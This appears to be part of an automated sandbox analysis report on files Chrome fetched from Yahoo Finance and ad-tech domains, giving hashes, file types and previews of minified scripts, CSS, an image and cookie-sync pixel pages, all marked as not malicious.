                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (30599)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):39259
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.45557904507731
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:WCGwi1LSavParYzcHN64C32j1zNeAmRymiB9ukCC3nKYRWauVyaqYX6VZn3Wf/La:WD9nyLCSgQbVWS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:174A101C3DBE2877566569641FEEC931
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:56F03C23357169AB67794BEB03079733A078B5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98C9197C4F688AED8389354618E28706AE8F678FD9CF920E585E1E2E9861BAB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:88925A0A08ED09F3B11007FF3442B5231307F427CA562EDA31C2C765E283F3A2AA8658D7F30F24BF009AB39ED342C0E789FBC3E38FD797537FF5F503B24BFEA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/PageProgressBar.D-6_6JJN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["./Debug.CbytgeI4.js","./scheduler.Dsuh-FKt.js","./index.CvwOawEI.js","./each.CI2tb2RB.js","./commonUtil.BWwawKjd.js","./stores.BCwnb1-k.js","./43.BgWy8GOF.js","./control.CYgJF_JY.js","./Button.C2rixdaC.js","./spread.CgU5AtxT.js","./Icon.C8w5V9EK.js","../assets/Icon.DgFg0-NP.css","./i13nUtil.8E8_gCdn.js","../assets/Button.D4GRMVdO.css","./expand_more.DscV4c36.js","./Select.DMUNtRO-.js","./check.21reEWCG.js","./a11y-dialog.esm.BnYZCIGX.js","../assets/Select.G4QVlChI.css","./close.C3ug6nNR.js","./AccordionItem.Bf1KTDMO.js","./index.CwoOB1cS.js","../assets/AccordionItem.COAy-xrR.css","./Link.vSNQugO0.js","../assets/Link.CHR7GGSC.css","./Switch.5Dhu_-MN.js","../assets/Switch.BaMlRiYx.css","./ads.DhuB_mth.js","./Tab.cTfs0lLE.js","./Tabs.6aO2IOBS.js","./Tooltip.CzSuDxyY.js","./floating-ui.dom.C5fi-pG6.js","../assets/Tooltip.IRw8ojlh.css","./yf-lock.ClgspVU1.js","./yf-unlock.DelAiXlN.js","../assets/Tabs.agUa80w0.css","../assets/Debug.SsTdzNxF.css"],__vite__mapDeps=i=>i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.209769182472249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:RUAOqJDh2TCbRM4wn1fhPB9WieXIpW/tigBeJgnpNF6s5:SAXJDhXM1fIie40liy1p6s5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CCC8E8622D9B302E99027D98B5ED6442
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1005DA8DE172CAB3861617CCBEC0D0B5E446CF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F9D7D167400955D50562C84BA9DB06FBE0E6946BC69D21CDB02A13764F44BA62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B76577A44256D3E63A7DCC0E7575D356E9B04C6D4D1BDA67B82D850738DDFD81B4846E4380AF9E863E70434F7E55E633903A97F8D978561350F34449AF07F1D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ads.DhuB_mth.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var l=(r=>(r.DESTROYED="nimbus:ad-destroyed",r.AD_CONTROLLER_READY="nimbus:ad-controller-ready",r))(l||{});function m(r){return new CustomEvent("nimbus:ad-destroyed",{detail:r})}function S(r){return new CustomEvent("nimbus:ad-controller-ready",{detail:r})}function y(r,n){return r.replace(/{{(.*?)}}/g,(e,t)=>n[t]!=null?n[t].toString():e)}function b(r,n={}){return Object.entries(r).reduce((e,[t,i])=>{if(i)if("path"in i){const a=y(i.path,n);e[t]={...i,path:a}}else e[t]=i;return e},{})}function f(r){return Array.isArray(r)&&r.length===2&&typeof r[0]=="number"&&typeof r[1]=="number"}function s(r,n=","){return Array.isArray(r)?f(r)?r.join("x"):r.map(e=>Array.isArray(e)?e.join("x"):e.toString()).join(n):r??""}function c(r,{width:n}){return r[0]<=n}function g(r,n){if(!Array.isArray(r))return r;if(f(r))return c(r,n)?r:void 0;const e=r.filter(t=>!f(t)||c(t,n));return e.length?e:void 0}const d=10;function h(r){if(Array.isArray(r)){if(f(r)){const[n,e]=r;return e<d?void 0:e}for(const n of r){if(!f(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2717333209287425
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:BZEChRgbGbzbLcp1UaVOK2Ld0IOs9Vd/HqBMb:B+ChRgyXfA1UaVOKg0A95b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F33E1CE039CACA503D4980D3EA747110
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB674D0EB044888293EC08A7943B70EDA9B1878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B7A6117421958626D29847F0888D4C4DF9D67FD74D0708C6E21D43288D3A5E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:37BB36FF6F76F89DE8901744FAAC0B6C17E5B5AE6ED470073C3E7D17FC8D1C32E7567918CD3B97A5648CF9D9A4D68B3F4C2A1B5D9D59F5935C14812D293B1C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/updatePositions.BP26waY1.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as S,h as b,c as A,j as N,E as _,k as h}from"./commonUtil.BWwawKjd.js";import{f as L,l as O}from"./logUtil.CCV3qKPL.js";import{l as q}from"./loadQuote.BOFhtUlf.js";const T={add:{perfLabel:"addPositions",operandName:"symbol",operationToPerform:"position_insert"},delete:{perfLabel:"deletePositions",operandName:"posId",operationToPerform:"position_delete"},reorder:{perfLabel:"reorderPositions",operandName:"posId",operationToPerform:"position_update"}};function D(e,t,i){const{action:o}=e,{operandName:d,operationToPerform:a}=T[o];let s=!1;if(o==="add"){const{insertAtEnd:n=!1}=e;s=n}return t.map((n,r)=>({operation:a,[d]:n,...o!=="delete"&&{sortOrder:s?i+r:r}}))}const F=e=>e?Array.isArray(e)?e:e.split(","):null;async function B(e,t){var y,P,I;const i=await S(e);if(!b(i)||!((y=i.user)!=null&&y.guid))return null;const{pfId:o,silent:d=!1,action:a}=t,[s]=await A(["portfolio"],e),n=i.user.guid,r=a==="add",{perfLabel:f}=T[a],l=r?F(t.symbols):t.posIds;if(!o||!l||!l.length)return null;let c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 240 x 34, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.732123200569469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:HCPVHbdLb/levTWdqgmGYDQpuYpdKqLxoh5F:HCNHxL4O0QpXKqOt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D0E45188F6A8F2E8F2528E762FE55D33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:42A007181ABDADCC4C79D03D74B08F39DDDC5127
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB2DC4C95EA5B692229713672E7AEAE32B3914BAFCD63F926116D6637BD1976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0FD2F174A63472217D8BC23DE69DCBCAA1A583DED45152430D1A5BA455F6B1F360815DB34B5C8F96DA7DAAE232DB52197775F7F50955F497D6B664EB93B58800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......".....V}.....{PLTE............................................................................................................................x.....(tRNS....!.k6...L........)....Y..D..q>.wdS_._.D...'IDATh..Y.0.M............!.^..z.....&.d.......,...@.....m.&x..l....M.-.k4....kZa.........Y..F....=I..jx.C..H..W......e....o.oO.|..D..?#.D.{~..own*...S.........7..K.....<...nA..~.8."q.@....C2...j...>..t}....(..M..@^....a..x..~J8.n{.G..b$..m_%.Y.........X.X)..Y.b.qk..].....`z...1=...vu..dj..7c').h....L..0.+e*BC...S.....jyzb.\.........3G1K..`..{Kl..{_%....F.....g....h.)n..F...-&...K....)6...hV.e.#3.N..O,.....~'..s....SZ..!.).0..u.....v.1.....<...F...O.O...@....Bk.j.8[.D.4Y.5...h.-..:dAIzn.)>...\..1.....s.#[.{.....}.+.3....T.w..F.#.aaa.....7.5..QR...Q*....].#..n....R..`,q...n..B:..4...=.w.../..fNN...<.P..j.U...D...c.T.(.R.X8..~el..>.h.]]5\....6.-...9#.$.:..a6..1.U..`L.4.%...v....+D.eN.znm....v...H..T....o...;)X.\..0...x..5}B..*.Q.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5570), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.224150317868789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:V6DUauGy2kvP5W7NRHKrmCRFqaLsL2eOt666o2hG:V6DWvP5WxErgOtwRhG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2A251A0DDB3D7C4EC13F4E35EE35DD2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E400B6FBA5E2A71F489AD4FC92D4B2243E90E139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09BEEED1E13C0CC009D030711289983F71028B3288F1E840ECAAC82BA381C04A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2301875E90FF6B4C85B1CAF35CF87ED04A7A7F038355827DA63D36BB3FC95A1AF5396CC936E318D078AD624AC7C9A4976436AD2F56814139E837AD82BDADBB8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--pebble\){border-color:#c7cdd2;border-color:var(--pebble)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdtc\(--dirty-seagull\){border-top-color:#e0e4e9;border-top-color:var(--dirty-seagull)}#atomic .Bdendc\(--hulk-pants\){border-right-color:#7e1fff;border-right-color:var(--hulk-pants)}#atomic .Bds\(s\){border-style:solid}#atomic .Bdts\(s\){border-top-style:solid}#atomic .Bdends\(s\){border-right-style:solid}#atomic .Bdw\(0\){border-width:0}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdtw\(1px\){border-top-width:1px}#atomic .Bdendw\(6px\){border-right-width:6px}#atomic .Bdendw\(8px\){border-right-width:8px}#atomic .Bdrs\(100\%\){border-radius:100%}#atomic .Bdrs\(2px\){border-radius:2px}#atomic .Bdrs\(4px\){border-radius:4px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bg\(--white\){background:#fff;background:var(--white)}#atomic .Bg\(t\){b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (681)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.598705628961987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:2e2C6hHfhiVIliWfwpBKzN90A9OdRjBpr0Bf:2e2C6lICiDcnOZBF0Bf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8EA2CDD6734983AA37EBD97CA808F265
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EF93CC0C38529280934AD6D91FF53A49C6959C65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FA104562A6032EDE1D1F34571932972DD55BE02FCE50F770FA200E8DED1F8785
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9B3DC47A75E4963F51F7BB9A0F8588442EF31E2B1049C78069A5545F9B81C497CCE7DDD04E69B5FD38DB7B60DB251EC9D4103E277CBD7F081C6189870B124FCF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://u.openx.net/w/1.0/pd?cc=1&gdpr=0&gdpr_consent=&us_privacy=1YNN&ph=2d1251ae-7f3a-47cf-bd2a-2f288854a0ba
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://sync-tm.everesttech.net/upi/pid/ny75r2x0?redir=https%3A%2F%2Fus-u.openx.net%2Fw%2F1.0%2Fsd%3Fid%3D537148856%26val%3D%24%7BTM_USER_ID%7D"><img src="https://pr-bh.ybp.yahoo.com/sync/openx/1d1d5d09-d0b5-a85e-6fc0-6f55ed82d00e?gdpr=0"><img src="https://s.amazon-adsystem.com/dcm?pid=6e1b1225-4dd8-4d7d-b277-465574a27014&id=d10c4730-5cb3-81ed-9e19-fb377ae6d6a7"><img src="https://match.adsrvr.org/track/cmf/openx?oxid=89da3b4d-4019-3a17-5e17-79a012d51d47&gdpr=0"><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_hm=YTViNWU4ODctODk2ZS02NGIzLTRiZjctMjMxOWQ4MzdkMzI3"><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_cm&google_sc">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.76176773688465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:A+T+CxvF4KBvN88+LVBCBJDKgddQEeGgX5AuvM8v0A4TB1bw:A+i84KBkVBODKgddQELgXeuvr8A40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:293CF07BB6B52A1A18D797328200C9C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BF69950A40F5BA11475E896A5EB2F7B049370031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8AC7E74D523881BB9FFB193D8897292CD05F78DFA91ECD285411D337361B1FB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:996AB8246130832BBF9F7ED8BC24419E34E501DF8D36A34FB16BF0269F90C593B3DA05F0FA96FE2444A0345B32175B4781192BA0FD02A11F33CB2902C44E5A00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/spread.CgU5AtxT.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function r(t,s){const c={},u={},f={$$scope:1};let i=t.length;for(;i--;){const o=t[i],e=s[i];if(e){for(const n in o)n in e||(u[n]=1);for(const n in e)f[n]||(c[n]=e[n],f[n]=1);t[i]=e}else for(const n in o)f[n]=1}for(const o in u)o in c||(c[o]=void 0);return c}function a(t){return typeof t=="object"&&t!==null?t:{}}export{a,r as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (855)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2806084270315035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:WrRvsVILEWA4a2VR/m2u/dxS7a5NFISbMbHl4a5Vo:iRv3EeVROHFVFIdDlo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8720A858E7727C57B51D6F2F147017E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0D68844FB964FDCB6BC925E28613A43B974CDD91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A83223F3D0B2F0AC5C39D4BA792A8792D7F2A78301CB1419ACC8AC7D2815E5C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8E1BA0F27711FCE659BBA6B30192467186D810926877DBA2F9E382332FF9A1B79423711CFF3D4D6588CB03484EE8C975DB87CE8E5D03C8BABC6360717D7C47C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadRMP._jo861JY.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as p,d as y}from"./commonUtil.BWwawKjd.js";import{l as m,f as P}from"./logUtil.CCV3qKPL.js";async function R(t,s){const{body:n,m_id:o,ctrl:a,m_mode:c="json",forceLoad:f=!1,service:u}=s,{customKey:d}=n||{customKey:void 0},r=d?`${o}.${a}.${d}`:`${o}.${a}`;if(!o||!a){const e=new Error("Bad request for loadRMP");return m(t,s,{data:e,perfLabel:`loadRMP:${r}`}),Promise.reject(e)}const[i]=await p(["rmp"],t);if(!f){const e=i.getState();if(e[r])return Promise.resolve(e[r])}try{const e=await y(t),l=await P(t,{isRelative:!0,pathname:"/xhr/rmp",perfLabel:`loadRMP:${r}`,query:{ctrl:a,m_id:o,m_mode:c,service:u||""}},{body:JSON.stringify({...n,...e,ctrl:a,environment:"production",m_id:o,m_mode:c}),credentials:"include",method:"POST"});return i.loadRmp(r,l),l}catch(e){return m(t,s,{data:e,perfLabel:`loadRMP:${r}`}),i.setError(r),null}}export{R as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11230), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.207546962286139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3ciaumTuQ/2lAg6gA2MZzXanihYZRCq4b8jbcMiISXsrFyOof7:3vmiQhgAfzXancMCqYciFXsrFyv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B29975904D91FE6FF597A7FD5A315391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:79A3373AD0C641BD858221C4B70A995215064AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B2918846CC75BC0BFC18AF81ABF8F0E4F9D30CFD5383639CE07601F4A74684E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:480A454CCED569439C22251D6DBB4300A340A2BBD777E62F90C2634902774F58046AE142848A2AC81276989642AF026A85B6F4F1E19A10B45BE9D7C2FB54A3F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-native-da-1.0.5-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-native-da"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1654), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.556175402880624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjkiUusyuqjuasedCKAHVGEq:N7pIfEjuafdCbIEq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C1E6CBEA76E135E9002F62520FEF85D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:82339A9C4E3662688D94F91CB36613E58F3F4D25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A6E2F96B8C4E4C9FFB8644F28A132F8B3133070CD73971D71C902C2BDDAB5947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F02F6D7BA0DBD011590D1F4DB5AF062BC34C7B02CF0061228F860B1F01FC8F7A831D8637C5468ED0302FD2AB4807AB3DDABCAEB0A9BC76094EEBB441401A9B56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=47445879&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2894)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.931250511770156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:4OOJN1yEjJkdR4Fm+zh+eFCHuOoS3YyqpDLuaXuH8Cn:D+auPCpmZJc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5D689E22AA6F27AE55A08750E286B7EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0FFA1A3C0B5108DC9A0DF5966B08E57235D8484A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF3CA512C6CBE43DFD4054DAAAE9DDD8C95F5BE85F9F6301612FB6BFEACDACB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CDC1A967E4C01AD9C66415D93CDE52AD42C1B26444381D22D0D0332F6E13001A05AC22F5A466EC0FB54669E8457BE06CB6358646F1D9E6741ECC40544A556793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/NavBar.CJPoP-H9.css
